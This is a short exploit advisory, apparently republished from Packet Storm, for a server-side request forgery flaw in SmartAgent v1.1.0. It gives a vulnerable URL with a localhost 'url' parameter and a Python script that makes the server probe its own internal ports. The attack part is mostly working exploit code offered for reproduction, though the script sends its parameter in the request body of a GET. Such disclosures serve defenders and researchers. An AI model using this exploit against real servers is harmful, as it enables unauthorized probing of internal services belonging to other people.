SmartAgent 1.1.0 Server-Side Request Forgery
2024-11-1 22:42:58 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏
2024-11-1 22:42:58 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏
# Exploit Title: SmartAgent v1.1.0 - Server-Side Request Forgery (SSRF)
# Date: 01-10-2024
# Exploit Author: Alter Prime
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com
# Version: Build v1.1.0
# Tested on: Kali LinuxAn unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script https://smarts-srlcom.com/FB/getFbVideoSource.php?url=http://127.0.0.1:80.
The GET request includes the vulnerable parameter "url".
Steps To Reproduce:
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0
#Python Exploit
import requests
url = "https://smartagent.[client].com/FB/getFbVideoSource.php"
port = input("Enter the port you want to check: ")
parameter = {
"url": "http://127.0.0.1:" + port
}
response = requests.get(url, data=parameter, verify=False)
if response.status_code == 200:
print(f"Port {port} is open on the server")
else:
print(f"Port {port} closed")
文章来源: https://packetstormsecurity.com/files/182450/smartagent110-ssrf.txt
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh